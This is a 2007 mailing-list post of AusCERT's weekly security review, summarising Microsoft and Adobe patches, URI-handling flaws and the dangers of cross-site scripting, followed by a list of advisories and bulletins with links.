[AusNOG] AusCERT Week in Review - Week Ending 12/10/2007 (AUSCERT#20073F686)
Richard Billington
richard at auscert.org.au
Fri Oct 12 16:44:56 EST 2007
AusCERT Week in Review
12 October 2007
Greetings,
On Wednesday this week Microsoft announced four critical updates to various
software products that previoiusly had remote code execution
vulnerabilities. These updates were for Windows (Kodak Image Viewer), Word,
Internet Explorer, and Outlook Express (Windows Mail). Even though the
Word vulnerability is only for Word 2000, Word 2002 (part of Office XP),
and Word 2004 (for Mac) there are currently active attacks using this
vulnerability. [1]
If you are running any of the software for which patches were released
then AusCERT recommend either upgrading as soon as possible, or using one
of the workarounds provided by Microsoft. More information can be found
on the Microsoft website
(http://www.microsoft.com/technet/security/bulletin/ms07-oct.mspx) and an
initial analysis at Breaking Point Systems
(https://strikecenter.bpointsys.com/articles/2007/10/10/october-2007-microsoft-tuesday).
[2][3]
Also this week Adobe announced vulnerabilities in Acrobat, Acrobat Reader,
PageMaker, Illustrator, and GoLive. Each of these have patches available
for them. Of these, the Acrobat and Acrobat Reader "mailto" vulnerabilities
have received the most attention.
This is another of the various vulnerabilities related to URI handling in
Windows and the applications they relate or get passed to. Recently
Microsoft released a security advisory on the issue
(http://www.microsoft.com/technet/security/advisory/943521.mspx) as have
a few other people/blogs: [4][5][6]
- http://www.pcworld.com/article/id,138322-pg,1/article.html
- http://blogs.technet.com/msrc/archive/2007/10/10/msrc-blog-additional-details-and-background-on-security-advisory-943521.aspx
Lastly I would like to draw your attention to the area of Cross Site
Scripting (XSS) vulnerabilities. Many people think that these are harmless
"pop-up-an-alert-box" problems. However you have to remember that XSS
vulnerabilities allow a malicious user to inject "active" content into a
vulnerable web page. This means that when a user visits that site they
could have their accounts hijacked, their user settings changed,
advertising added, or allow cookie theft/poisoning.
With cookie theft (or session hijacking), it is possible for an attacker
to obtain the data that a bank or auction website might use to check that
you are logged in and authenticated. This may then allow the attacker to
access those websites as if they were you.
Recently there was a incident where XSS was used to deface a political web
page. In this case it was just a matter of a website defacement, however
a more malicious person could have attempted some of this cookie data
theft. [7][8]
Regards,
Richard
- - --
Security Analyst | Hotline: +61 7 3365 4417
AusCERT | Fax: +61 7 3365 7031
Australia's National CERT | WWW: www.auscert.org.au
Brisbane QLD Australia | Email: auscert at auscert.org.au
References
[1] Exploit Wednesday follows Patch Tuesday Word update
http://www.theregister.com/2007/10/11/exploit_wednesday/
[2] Microsoft Security Bulletin Summary for October 2007
http://www.microsoft.com/technet/security/bulletin/ms07-oct.mspx
[3] October 2007 Microsoft Tuesday
https://strikecenter.bpointsys.com/articles/2007/10/10/october-2007-microsoft-tuesday
[4] Microsoft Security Advisory (943521)
http://www.microsoft.com/technet/security/advisory/943521.mspx
[5] Microsoft Finally Fixing Windows Bug
http://www.pcworld.com/article/id,138322-pg,1/article.html
[6] MSRC Blog: Additional Details and Background on Security Advisory 943521
http://blogs.technet.com/msrc/archive/2007/10/10/msrc-blog-additional-details-and-background-on-security-advisory-943521.aspx
[7] XSS flaw makes PM say: "I want to suck your blood"
http://www.zdnet.com.au/news/software/soa/XSS-flaw-makes-PM-say-I-want-to-suck-your-blood-/0,130061733,339282682,00.htm
[8] Howard 'hacker' pleads innocence
http://www.zdnet.com.au/news/security/soa/Howard-hacker-pleads-innocence/0,130061744,339282729,00.htm
Web Log Entries:
- - ----------------
Title: Advance fee fraud scammers researching potential targets
Date: 11 October 2007
URL: http://www.auscert.org.au/8185
Title: Hi! I'm not sure if you remember me ... but I have a trojan for you
Date: 11 October 2007
URL: http://www.auscert.org.au/8181
Alerts, Advisories and Updates:
- - -------------------------------
Title: AL-2007.0116 -- [Win] -- MS07-057 - Vulnerability in Internet Explorer
could allow Remote Code Execution and Spoofing
Date: 10 October 2007
URL: http://www.auscert.org.au/8174
Title: AL-2007.0115 -- [Win] -- MS07-056 - Vulnerability in Outlook Express
and Windows Mail could allow Remote Code Execution
Date: 10 October 2007
URL: http://www.auscert.org.au/8173
Title: AL-2007.0114 -- [Win] -- Workaround available for Adobe Reader and
Acrobat code execution vulnerability
Date: 09 October 2007
URL: http://www.auscert.org.au/8171
Title: AA-2007.0084 -- [Win][UNIX/Linux] -- Cross Site Scripting (XSS)
vulnerability in BlackBoard Learning System
Date: 09 October 2007
URL: http://www.auscert.org.au/8162
Title: AL-2007.0113 -- [Win][OSX] -- Microsoft October security bulletins
pre-release announcement
Date: 08 October 2007
URL: http://www.auscert.org.au/8168
External Security Bulletins:
- - ----------------------------
Title: ESB-2007.0787 -- [Win][OSX] -- Multiple vulnerabilities in various
Adobe products
Date: 12 October 2007
OS: Windows 2003, Windows 2000, Windows XP, Mac OS X, Windows Vista
URL: http://www.auscert.org.au/8201
Title: ESB-2007.0786 -- [Win] -- CA BrightStor ARCserve Backup Server
Arbitrary Pointer Dereference
Date: 12 October 2007
OS: Windows 2003, Windows 2000, Windows XP, Windows Vista
URL: http://www.auscert.org.au/8200
Title: ESB-2007.0785 -- [Win][RedHat][HP-UX][Solaris] -- HP Select Identity,
Remote Unauthorized Access
Date: 12 October 2007
OS: Solaris, Windows 2003, Red Hat Linux, HP-UX
URL: http://www.auscert.org.au/8199
Title: ESB-2007.0784 -- [HP-UX] -- HP-UX running Apache, Remote Unauthorized
Denial of Service (DoS)
Date: 12 October 2007
OS: HP-UX
URL: http://www.auscert.org.au/8198
Title: ESB-2007.0783 -- [Win][UNIX/Linux][RedHat] -- Moderate: tomcat security
update
Date: 12 October 2007
OS: Solaris, HP Tru64 UNIX, Debian GNU/Linux, Other BSD Variants, IRIX,
Windows 2003, OpenBSD, Windows 2000, FreeBSD, Other Linux Variants,
Windows XP, Red Hat Linux, Mac OS X, HP-UX, AIX, Windows Vista
URL: http://www.auscert.org.au/8197
Title: ESB-2007.0782 -- [RedHat] -- Important: libvorbis security update
Date: 12 October 2007
OS: Red Hat Linux
URL: http://www.auscert.org.au/8196
Title: ESB-2007.0781 -- [UNIX/Linux][RedHat] -- Important: hplip
(Hewlett-Packard Linux Imaging and Printing Project) security update
Date: 12 October 2007
OS: Solaris, HP Tru64 UNIX, Debian GNU/Linux, Other BSD Variants, IRIX,
OpenBSD, FreeBSD, Other Linux Variants, Red Hat Linux, Mac OS X, HP-UX,
AIX
URL: http://www.auscert.org.au/8195
Title: ESB-2007.0780 -- [OpenBSD] -- SSL_get_shared_ciphers() off-by-one
overflow error
Date: 12 October 2007
OS: OpenBSD
URL: http://www.auscert.org.au/8194
Title: ESB-2007.0779 -- [Solaris] -- Security Vulnerability in the Solaris
Auditing (BSM) Related to Network Auditing May Lead to Denial of
Service (DoS)
Date: 12 October 2007
OS: Solaris
URL: http://www.auscert.org.au/8193
Title: ESB-2007.0778 -- [Solaris] -- Multiple Security Issues Within The X
Font Server (xfs(1)) QueryXBitmaps and QueryXExtents Protocol Handlers
Date: 12 October 2007
OS: Solaris
URL: http://www.auscert.org.au/8192
Title: ESB-2007.0777 -- [Win] -- Kaspersky Web Scanner ActiveX Format String
Vulnerability
Date: 11 October 2007
OS: Windows 2003, Windows 2000, Windows XP, Windows Vista
URL: http://www.auscert.org.au/8191
Title: ESB-2007.0776 -- [Cisco] -- Cisco IOS Line Printer Daemon (LPD)
Protocol Stack Overflow
Date: 11 October 2007
OS: Cisco Products
URL: http://www.auscert.org.au/8190
Title: ESB-2007.0775 -- [Linux][Cisco] -- Cisco Wireless Control System
Conversion Utility Adds Default Password
Date: 11 October 2007
OS: Debian GNU/Linux, Other Linux Variants, Cisco Products, Red Hat Linux
URL: http://www.auscert.org.au/8189
Title: ESB-2007.0774 -- [Win][Linux][HP-UX] -- HP System Management Homepage
(SMH) Remote Cross Site Scripting (XSS)
Date: 11 October 2007
OS: Debian GNU/Linux, Windows 2003, Windows 2000, Other Linux Variants,
Windows XP, Red Hat Linux, HP-UX, Windows Vista
URL: http://www.auscert.org.au/8188
Title: ESB-2007.0773 -- [HP-UX] -- HP-UX running Apache, Remote Arbitrary Code
Execution, Cross Site Scripting (XSS)
Date: 11 October 2007
OS: HP-UX
URL: http://www.auscert.org.au/8187
Title: ESB-2007.0772 -- [Solaris] -- Security Vulnerabilities in the Solaris
Trusted Extensions "labeld" Service May Lead to a Denial of Service
(DoS) Condition
Date: 11 October 2007
OS: Solaris
URL: http://www.auscert.org.au/8186
Title: ESB-2007.0771 -- [Solaris] -- Security Vulnerability in the Solaris 10
Virtual File System (VFS) may Lead to a Denial of Service (DoS)
Condition
Date: 11 October 2007
OS: Solaris
URL: http://www.auscert.org.au/8184
Title: ESB-2007.0770 -- [UNIX/Linux] -- Asterisk - Buffer overflows in
voicemail when using IMAP storage
Date: 11 October 2007
OS: Solaris, HP Tru64 UNIX, Debian GNU/Linux, Other BSD Variants, IRIX,
OpenBSD, FreeBSD, Other Linux Variants, Red Hat Linux, Mac OS X, HP-UX,
AIX
URL: http://www.auscert.org.au/8183
Title: ESB-2007.0769 -- [Debian] -- New xfs packages fix arbitrary code
execution
Date: 11 October 2007
OS: Debian GNU/Linux
URL: http://www.auscert.org.au/8182
Title: ESB-2007.0768 -- [Solaris] -- Security Vulnerability in the
vuidmice(7M) STREAMS Modules May Lead to a Denial of Service (DoS)
Condition
Date: 10 October 2007
OS: Solaris
URL: http://www.auscert.org.au/8180
Title: ESB-2007.0767 -- [OpenBSD] -- Buffer Overflow in OpenBSD dhcpd server
Date: 12 October 2007
OS: OpenBSD
URL: http://www.auscert.org.au/8179
Title: ESB-2007.0766 -- [Win] -- MS07-059 - Vulnerability in Windows
SharePoint Services 3.0 and Office SharePoint Server 2007
Date: 10 October 2007
OS: Windows 2003, Windows 2000, Windows XP, Windows Vista
URL: http://www.auscert.org.au/8178
Title: ESB-2007.0765 -- [Win] -- MS07-058 - Vulnerability in RPC Could Allow
Denial of Service
Date: 10 October 2007
OS: Windows 2003, Windows 2000, Windows XP, Windows Vista
URL: http://www.auscert.org.au/8177
Title: ESB-2007.0764 -- [Win][OSX] -- MS07-060 - Vulnerability in Microsoft
Word Could Allow Remote Code Execution
Date: 10 October 2007
OS: Windows 2003, Windows 2000, Windows XP, Mac OS X, Windows Vista
URL: http://www.auscert.org.au/8176
Title: ESB-2007.0763 -- [Win] -- MS07-055 - Vulnerability in Kodak Image
Viewer Could Allow Remote Code Execution
Date: 10 October 2007
OS: Windows 2003, Windows 2000, Windows XP
URL: http://www.auscert.org.au/8175
Title: ESB-2007.0762 -- [Win][UNIX/Linux][RedHat] -- Moderate: opal security
update
Date: 09 October 2007
OS: Solaris, HP Tru64 UNIX, Windows 98/98SE, Debian GNU/Linux, Other BSD
Variants, IRIX, Windows 2003, OpenBSD, Windows 2000, FreeBSD, Other
Linux Variants, Windows XP, Red Hat Linux, Windows NT 4, Mac OS X,
HP-UX, AIX, Windows Vista, Windows ME
URL: http://www.auscert.org.au/8170
Title: ESB-2007.0761 -- [Win][UNIX/Linux] -- Moderate: pwlib security update
Date: 09 October 2007
OS: Solaris, HP Tru64 UNIX, Windows 98/98SE, Debian GNU/Linux, Other BSD
Variants, IRIX, Windows 2003, OpenBSD, Windows 2000, FreeBSD, Other
Linux Variants, Windows XP, Red Hat Linux, Windows NT 4, Mac OS X,
HP-UX, AIX, Windows Vista, Windows ME
URL: http://www.auscert.org.au/8169
Title: ESB-2007.0760 -- [UNIX/Linux][RedHat] -- Moderate: kdelibs security
update
Date: 09 October 2007
OS: Solaris, HP Tru64 UNIX, Debian GNU/Linux, Other BSD Variants, IRIX,
OpenBSD, FreeBSD, Other Linux Variants, Red Hat Linux, Mac OS X, HP-UX,
AIX
URL: http://www.auscert.org.au/8167
Title: ESB-2007.0759 -- [UNIX/Linux][RedHat] -- Moderate: kdebase security
update
Date: 09 October 2007
OS: Solaris, HP Tru64 UNIX, Debian GNU/Linux, Other BSD Variants, IRIX,
OpenBSD, FreeBSD, Other Linux Variants, Red Hat Linux, Mac OS X, HP-UX,
AIX
URL: http://www.auscert.org.au/8166
Title: ESB-2007.0758 -- [Linux][Debian] -- New lighttpd packages fix buffer
overflow
Date: 08 October 2007
OS: Solaris, HP Tru64 UNIX, Debian GNU/Linux, Other BSD Variants, IRIX,
OpenBSD, FreeBSD, Other Linux Variants, Red Hat Linux, Mac OS X, HP-UX,
AIX
URL: http://www.auscert.org.au/8165
Title: ESB-2007.0757 -- [Debian] -- New xen-utils packages fix several
vulnerabilities
Date: 08 October 2007
OS: Debian GNU/Linux
URL: http://www.auscert.org.au/8164
Title: ESB-2007.0750 -- [UNIX/Linux] -- Patches available to correct
vulnerabilities in Drupal Project issue tracking and Boost modules
Date: 09 October 2007
OS: AIX, HP-UX, Mac OS X, Red Hat Linux, Other Linux Variants, FreeBSD,
OpenBSD, IRIX, Other BSD Variants, Debian GNU/Linux, HP Tru64 UNIX,
Solaris
URL: http://www.auscert.org.au/8155
Title: ESB-2007.0745 -- [Solaris] -- Security Vulnerability in Solaris Named
Pipes (pipe(2)) May Allow Unauthorized Data Access
Date: 08 October 2007
OS: Solaris
URL: http://www.auscert.org.au/8150
Title: ESB-2007.0739 -- [Solaris] -- Sun Fire X2100 M2/X2200 M2 ELOM is
Vulnerable to Unauthorized Access
Date: 08 October 2007
OS: Solaris
URL: http://www.auscert.org.au/8143
Title: ESB-2007.0728 -- [Solaris] -- Local DoS in the Human Interface Device
(HID) Class Driver for Solaris
Date: 12 October 2007
OS: Solaris
URL: http://www.auscert.org.au/8128
Title: ESB-2007.0683 -- [Solaris] -- Security Vulnerability in RPCSEC_GSS
(rpcsec_gss(3NSL)) Affects Kerberos Administration Daemon (kadmind(1M))
Date: 12 October 2007
OS: Solaris
URL: http://www.auscert.org.au/8058
Title: ESB-2007.0560 -- [Solaris] -- Security Vulnerability in Mozilla 1.7 May
Allow Arbitrary JavaScript Commands to be Run
Date: 10 October 2007
OS: Solaris
URL: http://www.auscert.org.au/7897
Title: ESB-2005.0409 -- HP Security Bulletin HPSBUX01137 -- SSRT5954 rev.11 -
HP-UX TCP/IP Remote Denial of Service (DoS)
Date: 09 October 2007
OS: HP-UX
URL: http://www.auscert.org.au/5121
Title: ESB-2007.0036 -- [HP-UX] -- HPSBUX02181 SSRT061289 rev.1 - HP-UX
Running IPFilter, Remote Unauthorized Denial of Service (DoS)
Date: 11 October 2007
OS: HP-UX
URL: http://www.auscert.org.au/7205
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert at auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 367 bytes
Desc: not available
URL: <http://lists.ausnog.net/pipermail/ausnog/attachments/20071012/f31ee59c/attachment.sig>
More information about the AusNOG
mailing list